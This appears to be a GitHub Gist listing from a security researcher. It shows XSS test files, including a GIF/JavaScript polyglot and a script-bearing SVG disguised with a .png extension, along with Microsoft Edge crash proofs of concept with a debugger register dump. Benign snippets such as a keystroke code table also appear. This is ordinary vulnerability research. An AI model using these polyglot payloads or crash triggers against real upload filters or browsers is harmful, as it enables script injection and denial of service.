@h0wl
h0wl / test.gif
Created March 10, 2024 11:54
test xss gif
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
@h0wl
h0wl / test.svg.png
Created March 10, 2024 11:21
test svg with diff ext
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
@h0wl
h0wl / test.html
Created March 10, 2024 11:19
test html js
<html>
<head>
<script> alert(document.domain);</script>
</head>
<body>
<b> test 123</b>
</body>
</html>
@h0wl
h0wl / test.svg
Created March 10, 2024 11:17
test svg xss
@h0wl
h0wl / Vitual keystroke example
Created December 17, 2015 11:23 — forked from chriskiehl/Vitual keystroke example
Python win32api simple Virtual keystroke example
# Giant dictionary to hold key name and VK value
VK_CODE = {'backspace':0x08,
'tab':0x09,
'clear':0x0C,
'enter':0x0D,
'shift':0x10,
'ctrl':0x11,
'alt':0x12,
'pause':0x13,
'caps_lock':0x14,
@h0wl
h0wl / IE-Edge-diff.idl
Created November 11, 2015 22:08 — forked from MSEdge/IE-Edge-diff.idl
Proprietary / Non-Interoperable IE APIs no longer in Microsoft Edge
interface AesGcmEncryptResult {
readonly attribute ArrayBuffer ciphertext;
readonly attribute ArrayBuffer tag;
};
interface BookmarkCollection {
readonly attribute long length;
any item(unsigned long index);
@h0wl
h0wl / edge_crash2.html
Last active November 4, 2015 17:42
Edge Crash No Interaction
<!-- based on https://connect.microsoft.com/IE/feedback/details/1683347/ms-edge-combination-of-iframe-anchor-hash-navigation-and-history-state-crashes-the-browse -->
<!doctype html>
<html>
<head>
<script>
function boom() {
var iframe = document.getElementById('iframe1');
iframe.src = "http://bing.com";
iframe.src += "";
document.location.href = '#';
1:053> r
rax=0000000002000001 rbx=00007fff10b35f60 rcx=000000bdb9a099d0
rdx=000000bdb8b100d0 rsi=0000000000000000 rdi=000000bdb9a099d0
rip=00007fff10b80feb rsp=000000bdb9a097c0 rbp=000000bdb9a09860
r8=0000000000000000 r9=0000000000000000 r10=0000000000000000
r11=000000bdb9a09790 r12=000000bdb9a09940 r13=000000b5b6bb94c0
r14=000000bdb8b100d0 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
EDGEHTML!SHIsSameObject+0x4b:
@h0wl
h0wl / edge_crash.html
Last active December 12, 2015 09:51
Microsoft Edge Crash
<!-- based on https://connect.microsoft.com/IE/feedback/details/1683347/ms-edge-combination-of-iframe-anchor-hash-navigation-and-history-state-crashes-the-browse -->
<!doctype html>
<html>
<head>
<script>
function boom() {
var iframe = document.getElementById('iframe1');
document.location.href = '#';
iframe.parentNode.removeChild(iframe);
alert(history.state);
@h0wl
h0wl / json_poc.html
Created June 22, 2015 18:38
IE11 jsonp minimized poc
<!doctype html>
<html ng-app="app">
<head>
<script src="https://code.angularjs.org/1.4.0/angular.js"></script>
<script>
angular.module('app', []).run(function($http) {
$http.post("/boom",
{
"a1": {